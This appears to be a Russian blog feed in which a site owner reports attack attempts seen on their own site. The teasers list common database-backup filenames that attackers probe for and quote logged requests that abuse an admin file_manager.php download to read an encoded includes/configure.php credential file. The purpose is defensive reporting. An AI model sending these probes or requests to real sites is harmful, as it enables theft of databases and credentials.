Вы знаете как проще всего украсть базу данных вашего сайта?
Ее можно просто скачать с вашего сервера. Многие люди оставляют бэкапы там где их оставили ваши CMS или скрипты. и Злоумышленники могут найти их и скачать по стандартным названиям.
Вот пути по которым ищутся дампы:
/mysqld.sql
/zencart.sql
/database.sql
/dba.sql
Читать далее
Продолжаю про новые проверки на сайте:
Сегодня были запроса вида:
/admin/file_manager.php/login.php?action=download&filename=%69%6E%63%6C%75%64%65%73%2F%63%6F%6E%66%69%67%75%72%65%2E%70%68%70
/shop//admin/file_manager.php/login.php?action=download&filename=%69%6E%63%6C%75%64%65%73%2F%63%6F%6E%66%69%67%75%72%65%2E%70%68%70
/catalog//admin/file_manager.php/login.php?action=download&filename=%69%6E%63%6C%75%64%65%73%2F%63%6F%6E%66%69%67%75%72%65%2E%70%68%70
/store//admin/file_manager.php/login.php?action=download&filename=%69%6E%63%6C%75%64%65%73%2F%63%6F%6E%66%69%67%75%72%65%2E%70%68%70
Читать далее
У меня есть один сайт, который регулярно пытаются взломать или протестировать на уязвимости.
Теперь я буду периодически писать о последних попытках взлома и метода защиты от таких попыток.
Итак начнем: взлом сайта через PhpMyAdmin.
На днях по сайту прошли по следующим файлам: Читать далее